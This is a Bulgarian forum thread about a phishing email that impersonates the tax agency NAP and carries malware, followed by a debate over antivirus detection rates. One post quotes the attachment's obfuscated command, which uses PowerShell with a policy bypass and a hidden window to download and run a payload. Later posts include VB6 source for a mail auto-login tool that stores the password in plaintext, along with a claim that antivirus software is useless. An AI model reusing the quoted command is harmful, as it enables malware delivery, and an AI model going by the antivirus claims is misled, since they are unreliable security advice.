download.bg
 Вход Списание  Новини  Програми  Статии  Форум  Чат   Абонамент  Топ95   Архив 

Вирус от НАП

Автор
Съобщение
ezekia
Чет, 06.10.16, 13:23
Здравейте, не знам дали сте получавали мейл уж от НАП но има такъв и на него е прикачен вирус. Даже от официалната страница на НАП го упоменават.
Аз получих такъв мейл и ми е чудно какво ли прави този вирус? Ако някой може да провери мисля че ще е полезно.
Това е файл с ВИРУС !
izvestie_9.rar
svilen73
Чет, 06.10.16, 19:19
Според мен този ред в джава скрипта е показателен : "cMD.EXe /C " + eporxodri + "-ex^ecUt^IO^n^pOLI^C^y BYpAS^s -n^o^PR^OfiLE^ ^-WINdOwsT^YLe H^i^d^d^e^N^ (^neW-ObJ^EcT S^Y^StEM^.^n^eT.W^E^b^c^L^I^En^T^).d^oWN^Load^fi^le^(^'" + efossut + "c.bin',^'%APpdaTa%.eXe');st^aR^T^-proCe^ss '%APpDaTa%.ExE'";

Друг е въпроса какво прави вече този файл : APpDaTa.ExE

iceman_
Пет, 07.10.16, 21:48
Ми нема вирус ... 3/54 е нищо.

iceman_
Съб, 08.10.16, 06:35
Тая сутрин ВирусТотал ми даде вече 10/54 ... баси -

anonymous
Съб, 08.10.16, 23:01
iceman_ - след седмица когато антивирусните програми покажат 54/54 че е вирус някой ще седне и същия вирус ще напише с други "думи" и пак няма да се лови като вирус....

Антивирусните засичат вече засечени вируси
Антивирусните прихващат засечено "действие" като вирус

Най добрата антивирусна е

копие на всички важни файлове и копие на ОС-а

iceman_
Съб, 08.10.16, 23:10

RE: Вирус от НАП

iceman_ - след седмица когато антивирусните програми покажат 54/54 че е вирус някой ще седне и същия вирус ще напише с други "думи" и пак няма да се лови като вирус....

Антивирусните засичат вече засечени вируси
Антивирусните прихващат засечено "действие" като вирус

Най добрата антивирусна е

копие на всички важни файлове и копие на ОС-а „

Това е ясно, ама мноооого бавно компаниите си ъпдейтват дефинициите! На последната ми снимка го няма например - Касперски, баси.

dreven
Нед, 09.10.16, 09:27

RE: RE: Вирус от НАП

” Това е ясно, ама мноооого бавно компаниите си ъпдейтват дефинициите! На последната ми снимка го няма например - Касперски, баси. „
Безплатните антивирусни програми претърсват за АПИ функции или парчета сорс задействащ системни обекти. Тези парчета сорс може да са част от вирус, но може и да не са. За да бъде един подобен сорс вирус трябва да е доказано неговото вредно предназначение. При платените антивирусни програми нещата са доста по-строги и там не се допуска подобно лесно набеждаване на дадена програма за вирус, защото може да има сериозни правни и икономически последици за фирмата собственик на антивирусната програма. Мога да дам десетки примери на сорс, който се отчита като вирус от безплатни антивирусни програми и в същото време платени антивирусни програми да не го отразяват изобщо. Най-простото е да вземете една нормална инсталационна програма и да я преработите да стане portable. Веднага огромен брой безплатни антивирусни програми ще я отразят като вирус, а тя реално по своята функционалност и предназначение си е абсолютно същата програма. За мен лично безплатните антивирусни програми са програми кучета пазещи собствеността на производителите на платен софтуер и възпрепятстващи възможността този софтуер да се разпространява безплатно.
Така че когато дадена програма се набеждава за вирус трябва да се има предвид дали алармата идва от безплатни антивирусни програми или от сертифицирани платени антивирусни програми. Производителите на безплатните антивирусни програми изобщо не ги вълнува вие ще се заразите ли от вирус или не. Те печелят своите пари по съвършено друга схема. Те реално не продават своя продукт и не носят съдебна отговорност за него.
iceman_
Нед, 09.10.16, 21:11

RE: RE: RE: Вирус от НАП

"За мен лично безплатните антивирусни програми са програми кучета пазещи собствеността на производителите на платен софтуер

Производителите на безплатните антивирусни програми изобщо не ги вълнува вие ще се заразите ли от вирус или не. Те печелят своите пари по съвършено друга схема"
.
.

Изясни малко по-подробно какво имаш на в предвид ...

dreven
Пон, 10.10.16, 08:13
Ето прост пример: Купувам си някаква платена програма, която си заслужава. По време на инсталацията и регистрацията я превръщам в portable програма, която вече не иска код за активация. Вече е налице свободна програма, която като че ли може да работи на всеки друг компютър. Пращам я на теб, за да я ползваш и ти, но твоята безплатна антивирусна програма своевременно те алармира, че в тази програма най-вероятно има вирус. Като всеки здравомислещ човек, ти я изтриваш и всичко приключва. Опита платения софтуер да се превърне в безплатен е пресечен в зародиш. Но ако същата, толкова опасна програма я стартираме на компютър с платена антивирусна програма ще видим, че няма никакви аларми за зловреден код, защото реално няма такъв код. В моето обкръжение на колеги, масово се ползват безплатни антивирусни програми и дори тези програми са предпочитани, защото хващали вируси, които дори платените програми не можели. Тук се въздейства, чрез емоцията страх върху широката публика. Обикновеният потребител не се задълбочава да разсъждава над проблема, защо пищи антивирусната програма. А и да се задълбочи едва ли ще измисли нещо. Точно страха съчетан с пълно отсъствие на знания в областта на зловредния код, прави безплатните антивирусни програми предпочитани. Имам колеги качили по няколко антивирусни програми, за да са сигурни, че няма да ги удари вирус. Компютрите им са с прекрасни хардуерни характеристики, но по производителност не се отличават от някоя дърта машина на 10 години. Няма как тези хора попаднали под въздействието на страха да ги убедиш, да разтоварят машините си от тези безсмислени програми, макар в детайли да им обясняваш, че самата операционна система има две нива на защити и никакви допълнителни антивирусни програми няма да донесат допълнителна полза. Изобщо този проблем, не е технически. Тук говорим за психология. Преди години тук в download.bg показвах как е достатъчно на една празна форма без никакъв сорс да присвоиш иконка на Майкрософт взета от самата операционна система, да компилираш ехе и да провериш програмата, за да наблюдаваш реакция на десетки антивирусни програми. Ако промениш един пиксел само от иконката, антивирусните млъкват.
редактиран от dreven на 10.10.16 08:14
редактиран от dreven на 10.10.16 08:14
iceman_
Пон, 10.10.16, 08:53
Имаш ли под ръка някоя малка направена портабъл програмка за да го тествам в офиса, където имаме платени две антивирусни?
dreven
Вто, 11.10.16, 12:04

RE: Вирус от НАП

” Имаш ли под ръка някоя малка направена портабъл програмка за да го тествам в офиса, където имаме платени две антивирусни? „
Имам и спокойно можеш да си направиш експеримента тествайки ги с virustotal и платените антивирусни програми.

Преди години бях правил един калкулатор специално за един мой колега, който не беше доволен от произведението на Майкрософт. Прикачам ти следните неща:

1. Само exe-то, но то може да стартира само ако на компютъра ти някоя друга програма вече е регистрирала richtextbox, защото тази контрола се използва в него и инсталационен вариант на програмата, който ще работи безпреблемно, ако го инсталираш.
Kalkulator.rar

Само exe-то на virustotal ще излезе 0/56
Инсталационният пакет ще даде 1/56

2. Тук ти прикачам вече portable вариант, който трябва да стартира на всяка машина без инсталация:
KalkulatorPortable.rar
Във virustotal ще ти даде вече 6/56

А на платените антивирусни в твоя офис ще напишеш ти след теста.

Ето още един много показателен пример. Отново преди години бях написал проста програмка, която да ми отваря пощата в abv.bg само чрез стартиране на тази програма.
Ето самата програмка:
ABV2.zip
Ето и нейният проект:
ProektAbv.zip

За да работи програмката коректно в текстовия файл Nastroika.txt се записва пощата и паролата
При проверка във virustotal резултатът е 10/56 та това би трябвало да е вирус според разбиранията на мнозинството. Но дали е така? Не случайно съм прикачил проектчето на програмата, като в него има достатъчно коментари да се ориентира всеки новобранец.
Все пак, за да го видиш ти трябва Visual Basic 6.0, а ти може и да го нямаш, за това
ще покажа сорса тук:
Ето сорса за формата:
Private Sub Form_Load()
'Тук прочитаме текстовия файл
On Error Resume Next ' Този ред е манипулатор на грешка, няма да позволи затваряне на програмата при грешка
Set fso = CreateObject("Scripting.FileSystemObject") 'Създаваме скриптов обект за работа с файлове
ImeTxtFile = App.Path & "Nastroika.txt" ' това е пълното име на текстовия файл, който ще четем
Set ts = fso.OpenTextFile(ImeTxtFile, 1) ' създаваме обект, който прочита файла , 1 е константа за четене
Procheteno = ts.Readall   ' Въвеждаме в нашата променлива всичко, което се съдържа в прочетения текстов файл
ts.Close
 
'Парсваме стринга в масив
priznak = ";" ' Признака по който ще разделяме текста е точка и запетя
Erase TestArray ' Изтриваме масива в който ще въвеждаме, за да сме сигурни, че е празен
TestArray() = Split(Procheteno, priznak) ' Тук ПАРСВАМЕ тоест РАЗДЕЛЯМЕ текста и го въвеждаме в масив
Text1.Text = TestArray(0)
Text2.Text = TestArray(1)
 
 
 
 
 
 
 
'минимизираме всички отворени прозорци, чрез натискане на клавишна комбинация windows+M
''''''''''''''''''''''''''''''''''''''
KeyDown 91 'натискане на windows клавиш
KeyDown 77 'натискане на клавиша m
KeyUp 77 'пускане на клавиша m
KeyUp 91 'пускане на windows клавиша
''''''''''''''''''''''''''''''''''''''
LoopIeInstances 'извикване на процедурата за вход в пощата
Unload Me 'затваряне на формата
End Sub 

Ето сосрса за модула Klawihi
'модул за мощна АПИ функция за натискане на бутони програмно
 
Private Declare Sub keybd_event Lib "user32" ( _
ByVal bVk As Byte, ByVal bScan As Byte, _
ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
Private Const KEYEVENTF_EXTENDEDKEY = &H1
Private Const KEYEVENTF_KEYUP = &H2
'За прихващане на натиснати клавиши
Public Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Public Sub KeyDown(ByVal vKey As KeyCodeConstants)
keybd_event vKey, 0, KEYEVENTF_EXTENDEDKEY, 0
End Sub
 
Public Sub KeyUp(ByVal vKey As KeyCodeConstants)
keybd_event vKey, 0, KEYEVENTF_EXTENDEDKEY Or KEYEVENTF_KEYUP, 0
End Sub

Ето и сорса за Module1:
Public IE As Object 'декларираме публичен обект
 
'процедура за вход в пощата
Public Sub LoopIeInstances()
 
Set IE = CreateObject("InternetExplorer.Application") 'създаваме обекта интернет експлорер
IE.Visible = True 'правим го видим
With IE
'отваряме адреса за вход в пощата
.Navigate "https://passport.abv.bg/acct/passport/login"
'изчакваме докато браузъра е зает
Do While .Busy: DoEvents: Loop
Do While .ReadyState <> 4: DoEvents: Loop
End With
'въвеждаме името на пощата
IE.Document.LogInForm.username.Value = Form1.Text1.Text
'въвеждаме паролата за пощата
IE.Document.LogInForm.password.Value = Form1.Text2.Text
'програма натискаме бутона submit
IE.Document.GetElementByID("loginBut").Click
 
End Sub 

Къде е вируса знаят само безплатните антивирусни.
Тествай я и тази програма в офиса с платените антивирусни програми и напиши резултатът.

океан
Сря, 12.10.16, 12:21
Windows Defender на Уиндоус 10 не намира заплахи в портативните програми.Но на вируса от НАП реагира веднага.

iceman_
Сря, 12.10.16, 20:29

RE: RE: Вирус от НАП

Във ВирусТотал и четирите архива не активираха нито една сериозна антивирусна. Портабъла имаше 11/56 без сериозни антивирусни, а АБВ.ехе даде 4/56 като там едната беше Комодо. Домашната ми MS Essentials изобщо не реагира на нищо, а е - безплатна.
Аз обаче реших още нещо да направя - имам AVG с корпоративен лиценз и я инсталирах и тя реагира на AБВ.ехе. Странно.

dreven
Сря, 12.10.16, 22:52

RE: RE: RE: Вирус от НАП

” Във ВирусТотал и четирите архива не активираха нито една сериозна антивирусна. Портабъла имаше 11/56 без сериозни антивирусни, а АБВ.ехе даде 4/56 като там едната беше Комодо. Домашната ми MS Essentials изобщо не реагира на нищо, а е - безплатна.
Аз обаче реших още нещо да направя - имам AVG с корпоративен лиценз и я инсталирах и тя реагира на AБВ.ехе. Странно.

Тези прости тестове са показателни за качествата на антивирусните програми и целите, които се преследват. Ако програмистът си плати и сертифицира програмата си, тя ще престане да предизвиква аларми. Но ако я пусне свободно да се разпространява, дори и с отворен код, неговата програма ще сее само и единствено смут всред потребителите. Portable програмата ти е дала аларма на 11 антивирусни програми, което е приблизително всяка 5-та програма. Е кой нормален човек би пренебрегнал подобна заплаха? А в програмата няма никакъв вирус, защото съм я писал лично аз ред по ред. Но от една страна застава моята дума, а от другата страна са авторитетните IT компании. Но това беше едната страна на нещата където се алармира безпричинно, но другата страна е още по-жалка. Няма антивирусна програма, която да спре новонаписан вирус. Ако операционната система не се брани сама, никаква антивирусна не може да я опази. След като може софтуерно да се сработва произволен клавиш от клавиатурата, какъв е проблема една безобидна програма ползвайки само и единствено тази АПИ функция, която е разрешена от антивирусните програми , сама тя да напише произволна друга програма на която и да е машина? А да не говорим, че във всяко exe, може да се добави сорс, който в определен момент или при определени условия да смъкне от интернет свой двойник и само да се подмени. Тоест ти си проверяваш програмата преди да почнеш да я използваш, всички антивирусни мълчат и изведнъж Иван се превърнал на Петкан. В моя сборник по програмиране изрично съм добавил такъв работещ пример, за да стане ясен механизма на процеса. Това обяснява защо хората, които пишат софтуер не разчитат на антивирусни и не товарят машините си с безполезни програми. Те не ползват антивирусни програми не защото се смятат за велики, а защото не виждат никаква, ама абсолютно никаква полза от подобен софтуер. По нагоре един любител на вирусите точно е написал какъв е механизма за защита. Определено го подкрепям напълно.

Коментар

за нас | за разработчици | за реклама | станете автори | in english  © 1998-2024   Experta Ltd.